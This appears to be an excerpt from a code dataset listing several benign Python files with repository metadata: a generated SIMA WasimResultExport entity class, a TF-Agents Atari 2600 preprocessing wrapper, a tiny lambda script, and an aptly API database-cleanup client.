self.scriptableValues = list()
self.floaterBody = None
self.pointForces = list()
self.maxNumberOfWaveComponents = maxNumberOfWaveComponents
for key, value in kwargs.items():
if not isinstance(value, Dict):
setattr(self, key, value)
@property
def blueprint(self) -> Blueprint:
"""Return blueprint that this entity represents"""
return WasimResultExportBlueprint()
@property
def name(self) -> str:
""""""
return self.__name
@name.setter
def name(self, value: str):
"""Set name"""
self.__name = str(value)
@property
def description(self) -> str:
""""""
return self.__description
@description.setter
def description(self, value: str):
"""Set description"""
self.__description = str(value)
@property
def _id(self) -> str:
""""""
return self.___id
@_id.setter
def _id(self, value: str):
"""Set _id"""
self.___id = str(value)
@property
def scriptableValues(self) -> List[ScriptableValue]:
""""""
return self.__scriptableValues
@scriptableValues.setter
def scriptableValues(self, value: List[ScriptableValue]):
"""Set scriptableValues"""
if not isinstance(value, Sequence):
raise Exception("Expected sequense, but was " , type(value))
self.__scriptableValues = value
@property
def floaterBody(self) -> SIMOBody:
""""""
return self.__floaterBody
@floaterBody.setter
def floaterBody(self, value: SIMOBody):
"""Set floaterBody"""
self.__floaterBody = value
@property
def pointForces(self) -> List[BodyForceComponentReference]:
""""""
return self.__pointForces
@pointForces.setter
def pointForces(self, value: List[BodyForceComponentReference]):
"""Set pointForces"""
if not isinstance(value, Sequence):
raise Exception("Expected sequense, but was " , type(value))
self.__pointForces = value
@property
def maxNumberOfWaveComponents(self) -> int:
"""Limit the number of wave components exported to file"""
return self.__maxNumberOfWaveComponents
@maxNumberOfWaveComponents.setter
def maxNumberOfWaveComponents(self, value: int):
"""Set maxNumberOfWaveComponents"""
self.__maxNumberOfWaveComponents = int(value)
| 29.15748
| 96
| 0.649473
|
from __future__ import annotations
from typing import Dict,Sequence,List
from dmt.entity import Entity
from dmt.blueprint import Blueprint
from .blueprints.wasimresultexport import WasimResultExportBlueprint
from typing import Dict
from sima.sima.moao import MOAO
from sima.sima.scriptablevalue import ScriptableValue
from sima.simo.bodyforcecomponentreference import BodyForceComponentReference
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from sima.simo.simobody import SIMOBody
class WasimResultExport(MOAO):
def __init__(self , name="", description="", _id="", maxNumberOfWaveComponents=0, **kwargs):
super().__init__(**kwargs)
self.name = name
self.description = description
self._id = _id
self.scriptableValues = list()
self.floaterBody = None
self.pointForces = list()
self.maxNumberOfWaveComponents = maxNumberOfWaveComponents
for key, value in kwargs.items():
if not isinstance(value, Dict):
setattr(self, key, value)
@property
def blueprint(self) -> Blueprint:
return WasimResultExportBlueprint()
@property
def name(self) -> str:
return self.__name
@name.setter
def name(self, value: str):
self.__name = str(value)
@property
def description(self) -> str:
return self.__description
@description.setter
def description(self, value: str):
self.__description = str(value)
@property
def _id(self) -> str:
return self.___id
@_id.setter
def _id(self, value: str):
self.___id = str(value)
@property
def scriptableValues(self) -> List[ScriptableValue]:
return self.__scriptableValues
@scriptableValues.setter
def scriptableValues(self, value: List[ScriptableValue]):
if not isinstance(value, Sequence):
raise Exception("Expected sequense, but was " , type(value))
self.__scriptableValues = value
@property
def floaterBody(self) -> SIMOBody:
return self.__floaterBody
@floaterBody.setter
def floaterBody(self, value: SIMOBody):
self.__floaterBody = value
@property
def pointForces(self) -> List[BodyForceComponentReference]:
return self.__pointForces
@pointForces.setter
def pointForces(self, value: List[BodyForceComponentReference]):
if not isinstance(value, Sequence):
raise Exception("Expected sequense, but was " , type(value))
self.__pointForces = value
@property
def maxNumberOfWaveComponents(self) -> int:
return self.__maxNumberOfWaveComponents
@maxNumberOfWaveComponents.setter
def maxNumberOfWaveComponents(self, value: int):
self.__maxNumberOfWaveComponents = int(value)
| true
| true
|
1c4488e1a483c60aa43bdc2ef73a7cb25713757e
| 7,609
|
py
|
Python
|
tf_agents/environments/atari_preprocessing.py
|
wookayin/tensorflow-agents
|
ae3751dfeed52422a350227047648dd82297960b
|
[
"Apache-2.0"
] | 2
|
2018-12-20T01:49:33.000Z
|
2019-12-09T13:17:05.000Z
|
tf_agents/environments/atari_preprocessing.py
|
Akshay22121995/agents
|
1455410dffed3cfdede793b87c179965cdd27d22
|
[
"Apache-2.0"
] | null | null | null |
tf_agents/environments/atari_preprocessing.py
|
Akshay22121995/agents
|
1455410dffed3cfdede793b87c179965cdd27d22
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright 2018 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A class implementing minimal Atari 2600 preprocessing.
Adapted from Dopamine.
https://github.com/google/dopamine/blob/master/dopamine/atari/preprocessing.py
This includes:
. Emitting a terminal signal when losing a life (optional).
. Frame skipping and color pooling.
. Resizing the image before it is provided to the agent.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from gym.spaces.box import Box
import numpy as np
import gin.tf
import cv2
@gin.configurable
class AtariPreprocessing(object):
"""A class implementing image preprocessing for Atari 2600 agents.
Specifically, this provides the following subset from the JAIR paper
(Bellemare et al., 2013) and Nature DQN paper (Mnih et al., 2015):
* Frame skipping (defaults to 4).
* Terminal signal when a life is lost (off by default).
* Grayscale and max-pooling of the last two frames.
* Downsample the screen to a square image (defaults to 84x84).
More generally, this class follows the preprocessing guidelines set down in
Machado et al. (2018), "Revisiting the Arcade Learning Environment:
Evaluation Protocols and Open Problems for General Agents".
"""
def __init__(self,
environment,
frame_skip=4,
terminal_on_life_loss=False,
screen_size=84):
"""Constructor for an Atari 2600 preprocessor.
Args:
environment: Gym environment whose observations are preprocessed.
frame_skip: int, the frequency at which the agent experiences the game.
terminal_on_life_loss: bool, If True, the step() method returns
is_terminal=True whenever a life is lost. See Mnih et al. 2015.
screen_size: int, size of a resized Atari 2600 frame.
Raises:
ValueError: if frame_skip or screen_size are not strictly positive.
"""
if frame_skip <= 0:
raise ValueError(
'Frame skip should be strictly positive, got {}'.format(frame_skip))
if screen_size <= 0:
raise ValueError('Target screen size should be strictly positive, got {}'
.format(screen_size))
self.environment = environment
self.terminal_on_life_loss = terminal_on_life_loss
self.frame_skip = frame_skip
self.screen_size = screen_size
obs_dims = self.environment.observation_space
# Stores temporary observations used for pooling over two successive
# frames.
self.screen_buffer = [
np.empty((obs_dims.shape[0], obs_dims.shape[1]), dtype=np.uint8),
np.empty((obs_dims.shape[0], obs_dims.shape[1]), dtype=np.uint8)
]
self.game_over = False
self.lives = 0 # Will need to be set by reset().
@property
def observation_space(self):
# Return the observation space adjusted to match the shape of the processed
# observations.
return Box(
low=0,
high=255,
shape=(self.screen_size, self.screen_size, 1),
dtype=np.uint8)
@property
def action_space(self):
return self.environment.action_space
@property
def reward_range(self):
return self.environment.reward_range
@property
def metadata(self):
return self.environment.metadata
def reset(self):
"""Resets the environment.
Returns:
observation: numpy array, the initial observation emitted by the
environment.
"""
self.environment.reset()
self.lives = self.environment.ale.lives()
self._fetch_grayscale_observation(self.screen_buffer[0])
self.screen_buffer[1].fill(0)
return self._pool_and_resize()
def render(self, mode):
"""Renders the current screen, before preprocessing.
This calls the Gym API's render() method.
Args:
mode: Mode argument for the environment's render() method.
Valid values (str) are:
'rgb_array': returns the raw ALE image.
'human': renders to display via the Gym renderer.
Returns:
if mode='rgb_array': numpy array, the most recent screen.
if mode='human': bool, whether the rendering was successful.
"""
return self.environment.render(mode)
def step(self, action):
"""Applies the given action in the environment.
Remarks:
* If a terminal state (from life loss or episode end) is reached, this may
execute fewer than self.frame_skip steps in the environment.
* Furthermore, in this case the returned observation may not contain valid
image data and should be ignored.
Args:
action: The action to be executed.
Returns:
observation: numpy array, the observation following the action.
reward: float, the reward following the action.
is_terminal: bool, whether the environment has reached a terminal state.
This is true when a life is lost and terminal_on_life_loss, or when the
episode is over.
info: Gym API's info data structure.
"""
accumulated_reward = 0.
for time_step in range(self.frame_skip):
# We bypass the Gym observation altogether and directly fetch the
# grayscale image from the ALE. This is a little faster.
_, reward, game_over, info = self.environment.step(action)
accumulated_reward += reward
if self.terminal_on_life_loss:
new_lives = self.environment.ale.lives()
is_terminal = game_over or new_lives < self.lives
self.lives = new_lives
else:
is_terminal = game_over
if is_terminal:
break
# We max-pool over the last two frames, in grayscale.
elif time_step >= self.frame_skip - 2:
t = time_step - (self.frame_skip - 2)
self._fetch_grayscale_observation(self.screen_buffer[t])
# Pool the last two observations.
observation = self._pool_and_resize()
self.game_over = game_over
return observation, accumulated_reward, is_terminal, info
def _fetch_grayscale_observation(self, output):
"""Returns the current observation in grayscale.
The returned observation is stored in 'output'.
Args:
output: numpy array, screen buffer to hold the returned observation.
Returns:
observation: numpy array, the current observation in grayscale.
"""
self.environment.ale.getScreenGrayscale(output)
return output
def _pool_and_resize(self):
"""Transforms two frames into a Nature DQN observation.
For efficiency, the transformation is done in-place in self.screen_buffer.
Returns:
transformed_screen: numpy array, pooled, resized screen.
"""
# Pool if there are enough screens to do so.
if self.frame_skip > 1:
np.maximum(
self.screen_buffer[0],
self.screen_buffer[1],
out=self.screen_buffer[0])
transformed_image = cv2.resize(
self.screen_buffer[0], (self.screen_size, self.screen_size),
interpolation=cv2.INTER_AREA)
int_image = np.asarray(transformed_image, dtype=np.uint8)
return np.expand_dims(int_image, axis=2)
| 32.939394
| 80
| 0.697858
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from gym.spaces.box import Box
import numpy as np
import gin.tf
import cv2
@gin.configurable
class AtariPreprocessing(object):
def __init__(self,
environment,
frame_skip=4,
terminal_on_life_loss=False,
screen_size=84):
if frame_skip <= 0:
raise ValueError(
'Frame skip should be strictly positive, got {}'.format(frame_skip))
if screen_size <= 0:
raise ValueError('Target screen size should be strictly positive, got {}'
.format(screen_size))
self.environment = environment
self.terminal_on_life_loss = terminal_on_life_loss
self.frame_skip = frame_skip
self.screen_size = screen_size
obs_dims = self.environment.observation_space
self.screen_buffer = [
np.empty((obs_dims.shape[0], obs_dims.shape[1]), dtype=np.uint8),
np.empty((obs_dims.shape[0], obs_dims.shape[1]), dtype=np.uint8)
]
self.game_over = False
self.lives = 0
@property
def observation_space(self):
return Box(
low=0,
high=255,
shape=(self.screen_size, self.screen_size, 1),
dtype=np.uint8)
@property
def action_space(self):
return self.environment.action_space
@property
def reward_range(self):
return self.environment.reward_range
@property
def metadata(self):
return self.environment.metadata
def reset(self):
self.environment.reset()
self.lives = self.environment.ale.lives()
self._fetch_grayscale_observation(self.screen_buffer[0])
self.screen_buffer[1].fill(0)
return self._pool_and_resize()
def render(self, mode):
return self.environment.render(mode)
def step(self, action):
accumulated_reward = 0.
for time_step in range(self.frame_skip):
_, reward, game_over, info = self.environment.step(action)
accumulated_reward += reward
if self.terminal_on_life_loss:
new_lives = self.environment.ale.lives()
is_terminal = game_over or new_lives < self.lives
self.lives = new_lives
else:
is_terminal = game_over
if is_terminal:
break
elif time_step >= self.frame_skip - 2:
t = time_step - (self.frame_skip - 2)
self._fetch_grayscale_observation(self.screen_buffer[t])
observation = self._pool_and_resize()
self.game_over = game_over
return observation, accumulated_reward, is_terminal, info
def _fetch_grayscale_observation(self, output):
self.environment.ale.getScreenGrayscale(output)
return output
def _pool_and_resize(self):
if self.frame_skip > 1:
np.maximum(
self.screen_buffer[0],
self.screen_buffer[1],
out=self.screen_buffer[0])
transformed_image = cv2.resize(
self.screen_buffer[0], (self.screen_size, self.screen_size),
interpolation=cv2.INTER_AREA)
int_image = np.asarray(transformed_image, dtype=np.uint8)
return np.expand_dims(int_image, axis=2)
| true
| true
|
1c448ad0afaccfbc61915a4250834d2e0132d2f5
| 38
|
py
|
Python
|
complute.py
|
liukuan127/HelloGitHub
|
54802e44e3feae5d292d9b68817ce4d9107d214a
|
[
"Apache-2.0"
] | null | null | null |
complute.py
|
liukuan127/HelloGitHub
|
54802e44e3feae5d292d9b68817ce4d9107d214a
|
[
"Apache-2.0"
] | null | null | null |
complute.py
|
liukuan127/HelloGitHub
|
54802e44e3feae5d292d9b68817ce4d9107d214a
|
[
"Apache-2.0"
] | null | null | null |
add = lambda a,b:a+b
print(add(2,5))
| 9.5
| 20
| 0.605263
|
add = lambda a,b:a+b
print(add(2,5))
| true
| true
|
1c448b851bdb5f9d335383f735e2b275471ee8fb
| 521
|
py
|
Python
|
aptly_api/parts/db.py
|
masselstine/aptly-api-client
|
dc8034a2b624b42f54d2e55ce2ad90e2fe165a33
|
[
"BSD-3-Clause"
] | null | null | null |
aptly_api/parts/db.py
|
masselstine/aptly-api-client
|
dc8034a2b624b42f54d2e55ce2ad90e2fe165a33
|
[
"BSD-3-Clause"
] | null | null | null |
aptly_api/parts/db.py
|
masselstine/aptly-api-client
|
dc8034a2b624b42f54d2e55ce2ad90e2fe165a33
|
[
"BSD-3-Clause"
] | null | null | null |
# -* encoding: utf-8 *-
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from typing import cast
from aptly_api.base import BaseAPIClient
from aptly_api.parts.tasks import TaskAPISection, Task
class DbAPISection(BaseAPIClient):
def cleanup(self) -> Task:
resp = self.do_post("api/db/cleanup")
return TaskAPISection.task_from_response(resp.json())
| 32.5625
| 69
| 0.731286
|
from typing import cast
from aptly_api.base import BaseAPIClient
from aptly_api.parts.tasks import TaskAPISection, Task
class DbAPISection(BaseAPIClient):
def cleanup(self) -> Task:
resp = self.do_post("api/db/cleanup")
return TaskAPISection.task_from_response(resp.json())
| true
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.